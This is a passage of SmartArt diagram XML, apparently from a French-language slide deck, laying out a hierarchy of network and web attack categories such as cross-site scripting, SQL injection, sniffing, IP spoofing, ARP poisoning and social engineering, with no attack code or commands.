        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A85206E0-4955-40F1-A796-CA9687A3B550}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Cross site </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
            <a:t>scripting</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{929E5ED5-5632-4A15-B2E0-E174DBA5FF2D}" type="parTrans" cxnId="{DEC2A7B4-D622-43D5-B76A-E5CE6AB76A45}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0598AFA6-0CD6-4079-8F98-D9E7194D42C5}" type="sibTrans" cxnId="{DEC2A7B4-D622-43D5-B76A-E5CE6AB76A45}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{319B07F9-92E2-4317-B514-B3D53FA9355D}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
            <a:t>SQl</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t> injection</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C3A7B02-73C9-4EC4-BE14-8FFB14310548}" type="parTrans" cxnId="{11DD34D4-F254-48D6-9F70-782297B3B10D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{68723F55-4ED3-4BC1-9026-7539C42C1D72}" type="sibTrans" cxnId="{11DD34D4-F254-48D6-9F70-782297B3B10D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D7C3753-43B4-4556-A8D9-0BD8EF0C93A0}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
            <a:t>Sniffing</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C82C7260-A3DF-463A-B232-28BE2B0DA3E8}" type="parTrans" cxnId="{45A18EF2-DE17-42E8-B525-2CB7D8EE49F2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E25D547E-A417-4567-B5A4-4B96B28AB566}" type="sibTrans" cxnId="{45A18EF2-DE17-42E8-B525-2CB7D8EE49F2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FA33CD36-F7AD-40B7-9100-DF81D5BFB516}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>IP </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
            <a:t>spoofing</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14C93F40-8DD5-4466-839D-E359AC67287A}" type="parTrans" cxnId="{55121F7B-2DDD-46D0-B9B6-5A12F34FFCDF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C2018177-D479-4C75-9C2E-207950F1744E}" type="sibTrans" cxnId="{55121F7B-2DDD-46D0-B9B6-5A12F34FFCDF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F6A8449-A297-463B-8AE0-E630DDBD748F}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>ARP </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
            <a:t>poisonning</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1A9DC9FE-99D4-4DFD-AAC8-ECA4AD3062BD}" type="parTrans" cxnId="{9EB4AD8C-0C0F-4CEC-AC5C-03749897F471}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{360D94EE-6B6D-4CEC-ACE7-237B371D2546}" type="sibTrans" cxnId="{9EB4AD8C-0C0F-4CEC-AC5C-03749897F471}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{461853A4-4763-4F41-A064-F86D5C6BC09D}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Les attaques par ingénierie sociale</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A18146E8-57D8-4ED1-AE2E-322FC8138B84}" type="parTrans" cxnId="{441BF497-BA10-4EA3-B0DC-69863AE910AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41584E96-4632-413E-9884-CD59F8C49948}" type="sibTrans" cxnId="{441BF497-BA10-4EA3-B0DC-69863AE910AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11520D8F-F568-45C4-9A0D-CB80043B3C51}" type="pres">
      <dgm:prSet presAssocID="{5F46A95F-FF67-4FC1-8019-487431071418}" presName="mainComposite" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chPref val="1"/>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22E907D6-F7ED-4096-8BCA-E6B630464BA7}" type="pres">
      <dgm:prSet presAssocID="{5F46A95F-FF67-4FC1-8019-487431071418}" presName="hierFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CFD92FBA-2575-4212-A47E-71108E23CFE5}" type="pres">
      <dgm:prSet presAssocID="{5F46A95F-FF67-4FC1-8019-487431071418}" presName="hierChild1" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chPref val="1"/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A9001BCD-897B-4C14-B6F1-D3B0E612000E}" type="pres">
      <dgm:prSet presAssocID="{2FABA74E-2A77-4C7A-81EC-90784E484613}" presName="Name14" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{29B0D7D5-D366-4671-92B6-D1D719E538F0}" type="pres">
      <dgm:prSet presAssocID="{2FABA74E-2A77-4C7A-81EC-90784E484613}" presName="level1Shape" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25C65460-EC98-4987-A3A8-BBC81EBE37B1}" type="pres">
      <dgm:prSet presAssocID="{2FABA74E-2A77-4C7A-81EC-90784E484613}" presName="hierChild2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2E453B0A-5E60-416D-B598-0423ED2E3DC4}" type="pres">
      <dgm:prSet presAssocID="{9FE2946B-9925-4626-84D1-8A6C8D9C7ACA}" presName="Name19" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90BC3FB5-13A2-4C1A-B22A-B2CB231D4F85}" type="pres">
      <dgm:prSet presAssocID="{0053A641-47A3-4294-8F48-19031BECE0A2}" presName="Name21" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5EB66E43-9098-4595-AF67-DD33B79D2090}" type="pres">
      <dgm:prSet presAssocID="{0053A641-47A3-4294-8F48-19031BECE0A2}" presName="level2Shape" presStyleLbl="node2" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB620496-917E-4500-AAC2-62C85CDD3EDF}" type="pres">
      <dgm:prSet presAssocID="{0053A641-47A3-4294-8F48-19031BECE0A2}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AA34B43D-E1E4-4E75-8AC3-861EEF03C561}" type="pres">
      <dgm:prSet presAssocID="{C82C7260-A3DF-463A-B232-28BE2B0DA3E8}" presName="Name19" presStyleLbl="parChTrans1D3" presStyleIdx="0" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F4E47D7-2917-4D8D-B9AD-892E6BB70A2E}" type="pres">
      <dgm:prSet presAssocID="{6D7C3753-43B4-4556-A8D9-0BD8EF0C93A0}" presName="Name21" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4DE98AA3-A92D-4B0E-9322-6B64CD59A4E7}" type="pres">
      <dgm:prSet presAssocID="{6D7C3753-43B4-4556-A8D9-0BD8EF0C93A0}" presName="level2Shape" presStyleLbl="node3" presStyleIdx="0" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{156BB247-FFFE-4B67-8D50-71A30373586F}" type="pres">
      <dgm:prSet presAssocID="{6D7C3753-43B4-4556-A8D9-0BD8EF0C93A0}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CE7C8533-E956-4401-8D0C-37256E86059F}" type="pres">
      <dgm:prSet presAssocID="{14C93F40-8DD5-4466-839D-E359AC67287A}" presName="Name19" presStyleLbl="parChTrans1D3" presStyleIdx="1" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{769C4283-42F1-4CFC-8EB2-C071482AC6EE}" type="pres">
      <dgm:prSet presAssocID="{FA33CD36-F7AD-40B7-9100-DF81D5BFB516}" presName="Name21" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1CD4D1E5-7344-468B-85F9-341A24E52D14}" type="pres">
      <dgm:prSet presAssocID="{FA33CD36-F7AD-40B7-9100-DF81D5BFB516}" presName="level2Shape" presStyleLbl="node3" presStyleIdx="1" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5CB02B6C-0DB1-4C22-98BB-E9E8CAA099A7}" type="pres">
      <dgm:prSet presAssocID="{FA33CD36-F7AD-40B7-9100-DF81D5BFB516}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8F640D39-0CB4-42FD-A94A-B3C6D783A864}" type="pres">
      <dgm:prSet presAssocID="{1A9DC9FE-99D4-4DFD-AAC8-ECA4AD3062BD}" presName="Name19" presStyleLbl="parChTrans1D3" presStyleIdx="2" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0253A9CB-F705-4443-A9BD-9F4B8676B505}" type="pres">
      <dgm:prSet presAssocID="{8F6A8449-A297-463B-8AE0-E630DDBD748F}" presName="Name21" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7FB854C6-B427-4A28-B992-417FBF0CA695}" type="pres">
      <dgm:prSet presAssocID="{8F6A8449-A297-463B-8AE0-E630DDBD748F}" presName="level2Shape" presStyleLbl="node3" presStyleIdx="2" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3D9A19B-AE6A-4BAD-A2A5-B7B1EFC7BE8B}" type="pres">
      <dgm:prSet presAssocID="{8F6A8449-A297-463B-8AE0-E630DDBD748F}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DAC7DE11-181D-4B5F-B252-2CDDFCB0DC6D}" type="pres">
      <dgm:prSet presAssocID="{E7873783-0C32-4A6B-B594-7FD03A983D14}" presName="Name19" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF7E29F5-9F6C-47ED-9226-0038F8C0FC49}" type="pres">
      <dgm:prSet presAssocID="{40E52624-FC92-4C7E-84EF-EC82BD596B33}" presName="Name21" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{764760C8-5A54-4FEF-B8D8-E75E998F068C}" type="pres">
      <dgm:prSet presAssocID="{40E52624-FC92-4C7E-84EF-EC82BD596B33}" presName="level2Shape" presStyleLbl="node2" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8782786-7F38-48C6-BC5F-F7D9DE8349D8}" type="pres">
      <dgm:prSet presAssocID="{40E52624-FC92-4C7E-84EF-EC82BD596B33}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6270AAD4-3E05-4515-9D53-8BBD66B82DF3}" type="pres">
      <dgm:prSet presAssocID="{EAC337A2-96DC-428E-AEE2-B3CFE70BDA92}" presName="Name19" presStyleLbl="parChTrans1D3" presStyleIdx="3" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D9C44963-E611-4E17-8E5B-124E517B7335}" type="pres">
      <dgm:prSet presAssocID="{EAEF9B93-102E-4583-8870-CCA3EE041A6B}" presName="Name21" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9AA690D0-4390-473E-882E-0EEBE5A1AFA6}" type="pres">
      <dgm:prSet presAssocID="{EAEF9B93-102E-4583-8870-CCA3EE041A6B}" presName="level2Shape" presStyleLbl="node3" presStyleIdx="3" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CBF07D8A-A819-4095-ADF5-D5562E6A7C47}" type="pres">
      <dgm:prSet presAssocID="{EAEF9B93-102E-4583-8870-CCA3EE041A6B}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5A06BD60-8407-4785-AA27-DA00864963B7}" type="pres">
      <dgm:prSet presAssocID="{357960A4-91BE-4E8F-9A2B-F9F4DE4C4E6D}" presName="Name19" presStyleLbl="parChTrans1D3" presStyleIdx="4" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DDC8AC4-6F33-4E64-A662-B4E2D8F58183}" type="pres">
      <dgm:prSet presAssocID="{5A01C866-3957-4004-AE52-56CB4C005A08}" presName="Name21" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A25DA1F4-098C-4C6B-B37C-EF0C150B28C1}" type="pres">
      <dgm:prSet presAssocID="{5A01C866-3957-4004-AE52-56CB4C005A08}" presName="level2Shape" presStyleLbl="node3" presStyleIdx="4" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36B0118B-12CA-4D00-93AF-3FCACB4CF857}" type="pres">
      <dgm:prSet presAssocID="{5A01C866-3957-4004-AE52-56CB4C005A08}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E240553A-351E-44A5-BA8D-FB4CACAC4D91}" type="pres">
      <dgm:prSet presAssocID="{517AEE69-2384-4D30-BADD-6370CA8D4F26}" presName="Name19" presStyleLbl="parChTrans1D3" presStyleIdx="5" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FBCE44F1-6A71-4DD3-80C6-AEFF09F7E28E}" type="pres">
      <dgm:prSet presAssocID="{278400EB-5301-4B12-B50F-FB9674404DBC}" presName="Name21" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F3398953-CD98-4B82-832B-5A5E160C250B}" type="pres">
      <dgm:prSet presAssocID="{278400EB-5301-4B12-B50F-FB9674404DBC}" presName="level2Shape" presStyleLbl="node3" presStyleIdx="5" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2349CB94-F1F2-4D9D-A3CC-FA731CCCD71A}" type="pres">
      <dgm:prSet presAssocID="{278400EB-5301-4B12-B50F-FB9674404DBC}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{59994F58-FFDA-4F5D-861D-90A4651667CB}" type="pres">
      <dgm:prSet presAssocID="{5F544288-29BA-47DB-8C99-1682CF83CF35}" presName="Name19" presStyleLbl="parChTrans1D3" presStyleIdx="6" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BA6600F6-E99C-4190-8723-B147A25CEBCF}" type="pres">
      <dgm:prSet presAssocID="{C1655CDA-F67F-4BA5-ABF6-BEBC7673F31E}" presName="Name21" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BDC9FFF8-A8C0-407E-AA99-2B95CB69E473}" type="pres">
      <dgm:prSet presAssocID="{C1655CDA-F67F-4BA5-ABF6-BEBC7673F31E}" presName="level2Shape" presStyleLbl="node3" presStyleIdx="6" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EED914D0-5CB2-41C4-ABC4-2E86D13B4CE4}" type="pres">
      <dgm:prSet presAssocID="{C1655CDA-F67F-4BA5-ABF6-BEBC7673F31E}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9A3B82B-FF69-4D50-AF52-579AB384566D}" type="pres">
      <dgm:prSet presAssocID="{2CF4A29F-3345-4F31-933E-6C28DBBFA638}" presName="Name19" presStyleLbl="parChTrans1D2" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1AAC5C3F-301F-483C-9BB4-4FCD66006B7E}" type="pres">
      <dgm:prSet presAssocID="{A97440A1-BD19-41F3-968C-DBD7BB990080}" presName="Name21" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{87699C69-64E6-48CB-874B-4376AFC271BD}" type="pres">
      <dgm:prSet presAssocID="{A97440A1-BD19-41F3-968C-DBD7BB990080}" presName="level2Shape" presStyleLbl="node2" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{567ED19B-51CF-41F3-87FD-2C12D458F045}" type="pres">
      <dgm:prSet presAssocID="{A97440A1-BD19-41F3-968C-DBD7BB990080}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D3FE403F-2753-47F2-A4FE-411C05F322F4}" type="pres">
      <dgm:prSet presAssocID="{929E5ED5-5632-4A15-B2E0-E174DBA5FF2D}" presName="Name19" presStyleLbl="parChTrans1D3" presStyleIdx="7" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{495BC297-6C22-4730-A9F1-18B2B73BE950}" type="pres">
      <dgm:prSet presAssocID="{A85206E0-4955-40F1-A796-CA9687A3B550}" presName="Name21" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1ACDF8FA-4141-4148-9615-A5FA8A68B3EB}" type="pres">
      <dgm:prSet presAssocID="{A85206E0-4955-40F1-A796-CA9687A3B550}" presName="level2Shape" presStyleLbl="node3" presStyleIdx="7" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6B8B100E-CFAC-4E34-ADED-50E173B36441}" type="pres">
      <dgm:prSet presAssocID="{A85206E0-4955-40F1-A796-CA9687A3B550}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{27C3F04D-E00F-4DC4-87DE-6E08EA2ACAD1}" type="pres">
      <dgm:prSet presAssocID="{7C3A7B02-73C9-4EC4-BE14-8FFB14310548}" presName="Name19" presStyleLbl="parChTrans1D3" presStyleIdx="8" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{570969FD-FA6E-4303-83DD-3D1A134A40B0}" type="pres">
      <dgm:prSet presAssocID="{319B07F9-92E2-4317-B514-B3D53FA9355D}" presName="Name21" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5DB4E6F2-CEA7-4B1F-84A4-B8F3413E819B}" type="pres">
      <dgm:prSet presAssocID="{319B07F9-92E2-4317-B514-B3D53FA9355D}" presName="level2Shape" presStyleLbl="node3" presStyleIdx="8" presStyleCnt="9"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{332CDEA6-7913-4E7A-AE08-EE649FB68496}" type="pres">
      <dgm:prSet presAssocID="{319B07F9-92E2-4317-B514-B3D53FA9355D}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CBB82E3A-2972-4968-9873-089649AE4944}" type="pres">
      <dgm:prSet presAssocID="{4FAC373D-EA01-45B0-8465-228A9C5CAD3E}" presName="Name19" presStyleLbl="parChTrans1D2" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F361442D-5298-416E-83E8-6DCB5286ABAE}" type="pres">
      <dgm:prSet presAssocID="{3B2B9533-E7F8-4134-93F2-9A61A0852F7D}" presName="Name21" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{19B82C52-C414-4381-B295-3EA71A5EAFAD}" type="pres">
      <dgm:prSet presAssocID="{3B2B9533-E7F8-4134-93F2-9A61A0852F7D}" presName="level2Shape" presStyleLbl="node2" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFCE0DF2-C9B1-4CF8-81E1-CEDB81F0CD8B}" type="pres">
